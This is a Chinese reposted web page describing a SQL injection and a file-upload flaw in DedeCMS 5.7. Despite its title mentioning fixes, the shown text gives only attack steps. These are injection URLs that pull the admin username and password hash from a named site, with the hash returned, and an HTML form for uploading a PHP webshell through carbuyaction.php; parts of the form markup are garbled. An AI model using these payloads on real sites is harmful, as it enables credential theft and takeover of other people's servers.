打开APP
userphoto
未登录

开通VIP,畅享免费电子书等14项超值服

开通VIP
织梦5.7注入加上传漏洞及修复
会员中心查询会员信息语句过滤不严,导致url可提交注入参数;
会员中心有上传动作过滤不严,导致上传漏洞
详细说明:
①注入漏洞。
这站http://www.XXX.com/
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
然后写上语句
查看管理员账号
http://www.xxx.com//member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20userid%20from%20`%23@__admin`%20where%201%20or%20id=@`'`
 
admin www.2cto.com
 
查看管理员密码
 http://www.30tianlong.com//member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@
 
8d29b1ef9f8c5a5af429
 
查看管理员密码
 
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
 
8d2
9b1ef9f8c5a5af42
9
 
cmd5没解出来 只好测试第二个方法
 
 
②上传漏洞:
 
只要登陆会员中心,然后访问页面链接
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
 
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
 
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
 
<form action="=../dialog/select_soft_post]
 
<[/url">http:// www.2cto.com /plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post"
 
enctype="multipart/form-data" name="form1">
file:<input name="uploadfile" type="file" /><br>
newname:<input name="newname" type="text" value="myfile.Php"/>
<button class="button2" type="submit">提交</button><br><br>
本站仅提供存储服务,所有内容均由用户发布,如发现有害或侵权内容,请点击举报
打开APP,阅读全文并永久保存 查看更多类似文章
猜你喜欢
类似文章
【热】打开小程序,算一算2024你的财运
Hydra使用方法
修复整理ecshop漏洞
跨站脚本漏洞(XSS)基础讲解
PHP168 V6.02 文件/member/post.php执行任意代码漏洞
关于取消phpcms 验证码
PHP输出从文本域的输入的空格和回车
更多类似文章 >>
生活服务
热点新闻
分享 收藏 导长图 关注 下载文章
绑定账号成功
后续可登录账号畅享VIP特权!
如果VIP功能使用有故障,
可点击这里联系客服!

联系客服